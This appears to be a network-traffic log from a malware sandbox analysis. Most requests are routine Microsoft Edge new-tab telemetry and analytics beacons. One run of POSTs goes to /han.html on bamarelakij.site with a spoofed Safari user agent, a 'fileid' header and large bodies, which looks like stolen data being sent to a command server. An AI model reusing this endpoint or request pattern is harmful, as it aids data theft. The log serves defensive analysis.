Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430974305&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b2?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C563ea3889fe3abb964bcb1736430975; XID=1C563ea3889fe3abb964bcb1736430975
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430974307&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=23f67ca56f3344ec8d439db43c56096e&activityId=23f67ca56f3344ec8d439db43c56096e&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CBE9B832AE174D9099F2C882F1E1862A&MUID=3D203036AC4A619B0A382559AD536038 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 5.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":48,"imageId":"BB1msG4y","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978081&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10988sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; _C_ETH=1
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978091&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 4803sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; _C_ETH=1
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978935&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5380sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; msnup=
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430979077&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9881sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; msnup=
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 53Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 683391Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 745Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 212Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 380Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 78289Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 68909Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 35Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 684831Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 745Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 212Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 380Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 78289Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 68855Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 35Host: bamarelakij.site

Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C563ea3889fe3abb964bcb1736430975; XID=1C563ea3889fe3abb964bcb1736430975
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430974307&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=23f67ca56f3344ec8d439db43c56096e&activityId=23f67ca56f3344ec8d439db43c56096e&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CBE9B832AE174D9099F2C882F1E1862A&MUID=3D203036AC4A619B0A382559AD536038 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; SM=T
